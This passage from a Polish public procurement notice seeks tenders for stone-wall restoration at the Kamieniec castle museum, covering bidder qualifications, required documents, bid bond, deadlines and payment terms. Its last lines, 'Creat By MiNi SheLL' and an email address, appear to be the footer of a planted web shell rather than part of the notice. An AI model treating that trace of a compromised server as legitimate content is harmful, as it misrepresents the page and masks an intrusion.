brutto.<br/> W przypadku Wykonawców wspólnie ubiegających się o udzielenie <br/> zamówienia ww. warunek można spełnić łącznie. <br/> Wskazana osoba podczas realizacji robót budowlanych musi posiadać ważne <br/> zaświadczenie o przynależności do właściwej izby samorządu zawodowego w <br/> rozumieniu ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych <br/> architektów oraz inżynierów budownictwa (t.j. Dz. U. z 2023 poz. 551). <br/> Zamawiający informuje, że posiadane przez osoby uprawnienia w <br/> wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SWZ <br/> powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz. U. <br/> z 2023r., poz. 682). Osoby, które posiadają uzyskane przed dniem wejścia w <br/> życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane <br/> lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do <br/> realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji <br/> technicznych w budownictwie i zachowały uprawnienia do pełnienia tych <br/> funkcji w dotychczasowym zakresie wykazują te dokumenty, jako <br/> obowiązujące. <br/> Zamawiający dopuszcza również możliwość uznania uprawnień wynikających <br/> z innych niż krajowe przepisów np. treści dyrektyw, zawartych umów <br/> międzynarodowych i innych przepisów, które potwierdzą spełnianie warunku <br/> dotyczącego dysponowania osobami zdolnymi do wykonania zamówienia. <br/> Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych <br/> uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane <br/> obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji <br/> Szwajcarskiej, z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo <br/> Budowlane (t.j. Dz. U. z 2023r., poz. 682) oraz ustawy o zasadach uznawania <br/> kwalifikacji zawodowych nabytych w państwach członkowskich Unii <br/> Europejskiej (t.j. Dz. U. z 2021r. poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu obowiązany jest złożyć wraz z ofertą oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 108 ust. 1 ustawy Pzp, i art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego. <br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 1składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/> Wzory oświadczeń stanowią załączniki nr 2 i 2a do SWZ. <br/>2. Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>a) złożyć wykaz robót budowlanych określonych rodzajowo w punkcie 8.4.a) SWZ, wykonanych nie wcześniej niż w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich:<br/> - rodzaju, - wartości, - daty i miejsca wykonania, - podmiotów, na rzecz <br/> których roboty te zostały wykonane; oraz załączyć dowody określające, czy <br/> te roboty zostały wykonane należycie.<br/> Dowodami, o których mowa powyżej są: - referencje, - inne dokumenty <br/> sporządzone przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli <br/> wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/> dokumentów – inne odpowiednie dokumenty. Wzór wykazu – załącznik nr 3 do <br/> SWZ,<br/>b) złożyć wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz podać informację o podstawie dysponowania osobami ujętymi w wykazie. Wzór wykazu – załącznik nr 4 do SWZ.<br/>c) złożyć polisę lub dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę nie mniejszą niż 150 000,00 PLN. <br/>d) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>e) oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów zgodnie z art. 108ust.1 pkt 6 ustawy Pzp.<br/> Wzór oświadczenia – załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy - zgodnie z Załącznikiem nr 1 do SWZ. <br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć: <br/> 1) oświadczenia, o których mowa w pkt 9 SWZ; <br/> 2) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie <br/> pełnomocnictwa (jeżeli dotyczy);<br/> 3) dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca obowiązany jest wnieść wadium w wysokości: 2 000,00zł (słownie: dwa tysiące złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/> 1) pieniądzu;<br/> 2) gwarancjach bankowych;<br/> 3) gwarancjach ubezpieczeniowych;<br/> 4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 <br/> pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/> Przedsiębiorczości (t.j. Dz. U. z 2022r. poz. 2080).<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy <br/>Zamawiającego w banku PKO Bank Polski Oddział w Rzeszowie na nr 43102043910000690201995968. <br/>6. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenia składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>3. W przypadku dokonania wyboru oferty wykonawcy występującego wspólnie, przed przystąpieniem do zawarcia umowy o zamówienie publiczne, przedłożona zostanie umowa regulującą współpracę wykonawców występujących wspólnie. Termin, na jaki została zawarta umowa wykonawców nie może być krótszy od terminu określonego na wykonanie zamówienia. <br/>4. Za wykonawców wspólnie ubiegających się o udzielenie zamówienia uważa się również wszystkich wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we wzorze umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>2. Zakres świadczenia wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p oraz wskazanym we wzorze umowy, stanowiącym Załącznik nr 6 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Formularz do złożenia oferty dostępny jest na Platformie e-Zamówienia w zakładce postępowania-informacje podstawowe</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający prowadzi postępowanie w imieniu i na rzecz:<br/>Kołder Andrzej F.H.U.P MUZEUM ZAMKOWE KAMIENIEC, MUZEUM KULTURY SZLACHECKIEJ z siedzibą w Korczynie<br/>ul. Podzamcze b/n 38 - 420 Korczyna.<br/>I. Wyjaśnienie treści Specyfikacji Warunków Zamówienia:<br/>1. Wykonawca może zwrócić się do zamawiającego z prośbą - wnioskiem o wyjaśnienie treści specyfikacji warunków zamówienia. Zamawiający udzieli wyjaśnień niezwłocznie, nie później niż na 2 dni przed upływem terminu składania ofert, pod warunkiem że wniosek o wyjaśnienie SWZ wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu składania ofert.<br/>2. Jeżeli zamawiający nie udzieli wyjaśnień w terminie, o którym mowa w pkt 13.1. przedłuża termin składania odpowiednio ofert o czas niezbędny do zapoznania się wszystkich zainteresowanych wykonawców z wyjaśnieniami niezbędnymi do należytego przygotowania i złożenia odpowiednio ofert.<br/>3. W przypadku gdy wniosek o wyjaśnienie treści SWZ albo opisu potrzeb i wymagań nie wpłynął w terminie, o którym mowa w pkt 13.1. zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużenia terminu<br/>składania ofert.<br/>4. Przedłużenie terminu składania ofert, o których mowa w pkt 13.3. nie wpływa na bieg terminu składania wniosku o wyjaśnienie treści odpowiednio SWZ albo opisu potrzeb i wymagań.<br/>5. Treść zapytań wraz z wyjaśnieniami zamawiający udostępnia, bez ujawniania źródła zapytania, na stronie internetowej prowadzonego postępowania.<br/>6. W uzasadnionych przypadkach zamawiający może przed upływem terminu składania ofert zmienić treść specyfikacji warunków zamówienia. Dokonaną zmianę treści specyfikacji zamawiający udostępnia na stronie internetowej prowadzonego postępowania.<br/>7. W przypadku gdy zmiana treści SWZ prowadzi do zmiany treści ogłoszenia o<br/>zamówieniu, Zamawiający zamieszcza w Biuletynie Zamówień Publicznych ogłoszenie o zmianie ogłoszenia na stronie internetowej prowadzonego postępowania.<br/>8. Zamawiający nie przewiduje zwołania zebrania wykonawców w celu wyjaśnienia treści SWZ.<br/>9. Osobą do kontaktu i porozumiewania się z wykonawcami jest:<br/>- w zakresie przedmiotu zamówienia – Janusz Pojnar; tel. 13 43 540 80<br/>- w zakresie procedury przetargowej – Bogusława Gargasz; tel. 13 43 540 80<br/>10. Wizja lokalna:<br/>Podstawą do złożenia oferty są obligatoryjne oględziny obiektu. Obiekt będzie<br/>udostępniony w godzinach pracy muzeum tj. 9:30 – 17:00.<br/>W celu umówienia oględzin należy dzwonić pod numer tel. 788837412, bądź<br/>kontakt e-mail pod adresem: zamek.kamieniec@gmail.com. Ze spotkania<br/>sporządzona zostanie notatka potwierdzona przez uczestników i inwestora.<br/>Brak oględzin jest równoznaczny z odrzuceniem oferty.<br/>II. Zabezpieczenie należytego wykonania umowy:<br/>Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy.<br/>III. Rozliczenia za wykonanie zamówienia:<br/>Rozliczenie za wykonany przedmiot umowy będzie odbywać się w sposób następujący:<br/>1) faktura częściowa – w wysokości 49% kwoty umowy wystawiona na<br/>podstawie podpisanego przez strony protokołu odbioru robót zawierającego<br/>wyszczególnienie wykonanych i odebranych robót budowlanych, płatna w<br/>terminie do 30 dni od daty otrzymania faktury przez Zamawiającego.<br/>2) faktura końcowa – w wysokości 51% kwoty umowy po wykonaniu całego<br/>zakresu rzeczowego zadania i podpisaniu protokołu odbioru końcowego<br/>inwestycji przez przedstawiciela Zamawiającego i Wykonawcy, płatna w<br/>terminie do 30 dni od daty otrzymania faktury przez Zamawiającego.<br/>IV. Informacja na temat podwykonawstwa:<br/>1. Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych zadań dotyczących robót<br/>budowlanych:<br/>- prace rozbiórkowe muru z kamienia,<br/>- izolacje przeciwwilgociowe,<br/>- wykucie zaprawy ze spoin murów,<br/>- ponowne ułożenie warstwy korony muru,<br/>- uzupełnienie spoin murów z kamienia zaprawą,<br/>- uzupełnienie ciosów kamiennych – rekonstrukcja.

Creat By MiNi SheLL
Email: jattceo@gmail.com